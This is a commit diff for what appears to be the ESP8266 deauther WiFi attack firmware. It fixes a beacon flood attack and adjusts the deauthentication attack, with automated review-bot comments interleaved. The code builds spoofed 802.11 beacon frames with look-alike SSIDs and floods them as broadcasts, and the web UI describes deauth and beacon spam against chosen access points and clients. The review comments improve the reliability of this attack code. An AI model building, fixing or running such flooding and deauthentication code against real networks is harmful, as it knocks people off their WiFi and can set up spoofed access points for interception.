Fixed beacon attack

Works now, but unfortunately only in broadcast. A targeted beacon flood attack on a specific client is mostly dropped (maybe because of the SDK?).
This commit is contained in:
Stefan Kremser
2017-02-24 18:24:44 +01:00
parent 725f0eb18c
commit b2907561c3
8 changed files with 40 additions and 25 deletions


@@ -103,7 +103,13 @@ String APScan::getResults(){
void APScan::select(int num){ void APScan::select(int num){
if(debug) Serial.println("seect "+(String)num+" - "+!selected[num]); if(debug) Serial.println("seect "+(String)num+" - "+!selected[num]);
selected[num] = !selected[num]; if(selected[num]){
selected[num] = false;
selectedSum--;
}else{
selected[num] = true;
selectedSum++;
}
} }
bool APScan::isSelected(int num){ bool APScan::isSelected(int num){
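Review bot: `num` is used as an index into `selected[]` on the new `if(selected[num]){` line (and on the two assignments below it) without any range check, so an out-of-range value from the caller reads and writes outside the array and also leaves `selectedSum` out of step with the array contents. Since `results` is the member that holds the number of valid entries, a guard at the top of the function, `if(num < 0 || num >= results) return;`, keeps both the array and the counter consistent. The size of `selected[]` is not visible in this diff, so the exact upper bound should be confirmed against the declaration.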


@@ -30,6 +30,7 @@ class APScan{
bool isSelected(int num); bool isSelected(int num);
int results = 0; int results = 0;
int selectedSum;
MacList aps; MacList aps;
private: private:
int channels[maxResults]; int channels[maxResults];
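Review bot: `int selectedSum;` is added without an initializer, unlike `int results = 0;` on the line above, so its value is indeterminate until the first `select()` call modifies it; Attack.cpp in this same commit now divides `macListLen` by `apScan.selectedSum`, so an indeterminate or stale count changes how many beacon frames are built per access point. `int selectedSum = 0;` is enough to fix the declaration, and any code that clears `selected[]` on a new scan (not visible here) should reset the counter alongside it.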


@@ -50,7 +50,7 @@ void Attack::buildBeacon(Mac _ap, Mac _client, String _ssid, int _ch, bool encry
for(int i=0;i<6;i++){ for(int i=0;i<6;i++){
//set target (client) //set target (client)
packet[4+i] = _client._get(i); //packet[4+i] = _client._get(i);
//set source (AP) //set source (AP)
packet[10+i] = packet[16+i] = _ap._get(i); packet[10+i] = packet[16+i] = _ap._get(i);
} }
@@ -83,16 +83,18 @@ void Attack::buildBeacon(Mac _ap, Mac _client, String _ssid, int _ch, bool encry
} }
bool Attack::send(){ bool Attack::send(){
delay(1); //less packets will be dropped
if(wifi_send_pkt_freedom(packet, packetSize, 0) == -1){ if(wifi_send_pkt_freedom(packet, packetSize, 0) == -1){
if(debug){ /*if(debug){
Serial.print(packetSize); Serial.print(packetSize);
Serial.print(" : "); Serial.print(" : ");
PrintHex8(packet, packetSize); PrintHex8(packet, packetSize);
Serial.println(""); Serial.println("");
} }*/
return false; return false;
}else return true; }else{
delay(1); //less packets are beeing dropped
return true;
}
} }
void Attack::run(){ void Attack::run(){
@@ -143,9 +145,12 @@ void Attack::run(){
if(debug) Serial.println(" done "); if(debug) Serial.println(" done ");
} }
/* =============== Beacon Attack =============== */
if(isRunning[1] && currentMillis-prevTime[1] >= 100){ if(isRunning[1] && currentMillis-prevTime[1] >= 100){
if(debug) Serial.print("running "+(String)attackNames[1]+" attack"); if(debug) Serial.print("running "+(String)attackNames[1]+" attack");
//int a = apScan.getFirstTarget();
for(int a=0;a<apScan.results;a++){ for(int a=0;a<apScan.results;a++){
if(apScan.isSelected(a)){ if(apScan.isSelected(a)){
String _ssid = apScan.getAPName(a); String _ssid = apScan.getAPName(a);
@@ -158,23 +163,27 @@ void Attack::run(){
wifi_set_channel(_ch); wifi_set_channel(_ch);
int _selectedClients = 0; //int _selectedClients = 0;
for(int c=0;c<macListLen;c++){ for(int c=0;c<macListLen/apScan.selectedSum;c++){
String _apName = _ssid; String _apName = _ssid;
if(c < _restSSIDLen) for(int d=0; d < _restSSIDLen-c; d++) _apName += " ";//e.g. "SAMPLEAP " if(c < _restSSIDLen) for(int d=0; d < _restSSIDLen-c; d++) _apName += " ";//e.g. "SAMPLEAP "
else if(c < _restSSIDLen*2){ else if(c < _restSSIDLen*2){
_apName = "."+_apName; _apName = " "+_apName;
for(int d=0;d<(_restSSIDLen-1)-c/2;d++) _apName += " ";//e.g. ".SAMPLEAP " for(int d=0;d<(_restSSIDLen-1)-c/2;d++) _apName += " ";//e.g. " SAMPLEAP "
}else if(c < _restSSIDLen*3){
_apName += ".";
for(int d=0;d<(_restSSIDLen-1)-c/3;d++) _apName += " ";//e.g. ".SAMPLEAP "
} else{ } else{
for(int d=0; d < _restSSIDLen-2; d++) _apName += " "; for(int d=0; d < _restSSIDLen-1; d++) _apName += " ";
_apName += (String)c;//e.g. "SAMPLEAP 78" _apName += (String)c;//e.g. "SAMPLEAP 78"
} }
//build a broadcast packet for this AP & SSID //build a broadcast packet for this AP & SSID
buildBeacon(beaconAdrs._get(c),_broadcast,_apName,_ch,apScan.getAPEncryption(a) != "none"); buildBeacon(beaconAdrs._get(c),_broadcast,_apName,_ch,apScan.getAPEncryption(a) != "none");
/*
for(int b=0;b<clientScan.results;b++){ for(int b=0;b<clientScan.results;b++){
if(clientScan.getClientSelected(b)){ if(clientScan.getClientSelected(b)){
_selectedClients++; _selectedClients++;
@@ -184,16 +193,15 @@ void Attack::run(){
if(send()) packetsCounter[1]++; if(send()) packetsCounter[1]++;
} }
} }*/
//if no clients are selected send the broadcast packet //if no clients are selected send the broadcast packet
if(_selectedClients == 0) if(send()) packetsCounter[1]++; /*if(_selectedClients == 0)*/ if(send()) packetsCounter[1]++;
} }
} }
} }
prevTime[1] = millis();
stati[1] = (String)(packetsCounter[1]*10)+"pkts/s"; stati[1] = (String)(packetsCounter[1]*10)+"pkts/s";
packetsCounter[1] = 0; packetsCounter[1] = 0;
macListChangeCounter++; macListChangeCounter++;
@@ -202,6 +210,7 @@ void Attack::run(){
macListChangeCounter = 0; macListChangeCounter = 0;
} }
if(debug) Serial.println(" done "); if(debug) Serial.println(" done ");
prevTime[1] = millis();
} }
if(isRunning[2] && currentMillis-prevTime[2] >= 1000){ if(isRunning[2] && currentMillis-prevTime[2] >= 1000){
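Review bot: In the hunk starting at `@@ -158,23 +163,27 @@`, the new loop bound `macListLen/apScan.selectedSum` is an unguarded integer division: if `selectedSum` ever exceeds `macListLen` (80) the bound becomes 0 and the loop silently builds no beacon for that AP, and if it is 0 or negative — possible if `selected[]` is cleared somewhere without touching the counter, which this diff does not show — the division faults or the bound goes negative. Computing the bound once before the loop makes the intent explicit: `int _perAp = apScan.selectedSum > 0 ? macListLen/apScan.selectedSum : 0;` followed by `for(int c=0;c<_perAp;c++){`. In the same hunk the new `c < _restSSIDLen*3` branch appends `"."` to the end of `_apName`, so its trailing comment should read `//e.g. "SAMPLEAP.   "` rather than `".SAMPLEAP "`, which describes the branch above it. `Attack::run` starts and ends outside the hunk.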


@@ -14,7 +14,6 @@ extern "C" {
#define attacksNum 2 #define attacksNum 2
#define macListLen 80 #define macListLen 80
#define macListInterval 5
extern void PrintHex8(uint8_t *data, uint8_t length); extern void PrintHex8(uint8_t *data, uint8_t length);
extern void getRandomVendorMac(uint8_t *buf); extern void getRandomVendorMac(uint8_t *buf);
@@ -48,6 +47,7 @@ class Attack
unsigned int packetsCounter[attacksNum]; unsigned int packetsCounter[attacksNum];
bool isRunning[attacksNum]; bool isRunning[attacksNum];
int packetRate = 10; int packetRate = 10;
int macListInterval = 4;
MacList beaconAdrs; MacList beaconAdrs;
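Review bot: Replacing `#define macListInterval 5` with the member `int macListInterval = 4;` also changes the value from 5 to 4, which the commit message does not mention, so a reader cannot tell whether the retune is deliberate. A one-line comment on the member naming what it counts would settle that; the Attack.cpp hunks show `macListChangeCounter` being incremented once per beacon round and reset to 0, so presumably something like `int macListInterval = 4; // beacon rounds between MAC-list changes`, to be confirmed against the comparison that is not in this diff. If nothing assigns to it at runtime, `const int` would additionally document it as a fixed setting.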



@@ -16,7 +16,7 @@ extern "C" {
const static char *ssid = "pwned"; const static char *ssid = "pwned";
const static char *password = "deauther"; //must have at least 8 characters const static char *password = "deauther"; //must have at least 8 characters
const bool debug = true; const bool debug = false;
ESP8266WebServer server(80); ESP8266WebServer server(80);
@@ -134,7 +134,7 @@ void startClientScan(){
if(server.hasArg("time") && apScan.getFirstTarget() > -1 && !clientScan.sniffing) { if(server.hasArg("time") && apScan.getFirstTarget() > -1 && !clientScan.sniffing) {
server.send(200, "text/json", "true"); server.send(200, "text/json", "true");
clientScan.start(server.arg("time").toInt()); clientScan.start(server.arg("time").toInt());
attack.stop(0); attack.stopAll();
} else server.send ( 200, "text/json", "Error: no selected access point"); } else server.send ( 200, "text/json", "Error: no selected access point");
} }


@@ -39,13 +39,12 @@
<br> <br>
<b>deauth [deauthentication attack]:</b><br> <b>deauth [deauthentication attack]:</b><br>
Sends deauthentication frames and dissociation frames to the selected client(s) in the selected WiFi access point(s). Sends deauthentication frames and dissociation frames to the selected client(s) in the selected WiFi access point(s).
<br>
<b>Note: </b>
If no client is selected, the packets are sent as broadcast!
<br><br> <br><br>
<b>beacon [beacon flood attack]:</b><br> <b>beacon [beacon flood attack]:</b><br>
Sends beacon frames to the selected client(s) with the same SSID as the selected WiFi access point(s). Spams beacon frames with a similar SSID as the selected WiFi access point(s).
<br><br>
<b>Note:</b><br>
If no client is selected, the packets are sent as broadcast!
<br>
</p> </p>
</div> </div>


@@ -1,4 +1,4 @@
function getResponse(adr, callback, timeoutCallback = function(){alert("timeout error. Please reload the site");}, timeout = 3000){ function getResponse(adr, callback, timeoutCallback = function(){alert("timeout error. Please reload the site");}, timeout = 5000){
var xmlhttp = new XMLHttpRequest(); var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function() { xmlhttp.onreadystatechange = function() {
if(xmlhttp.readyState == 4){ if(xmlhttp.readyState == 4){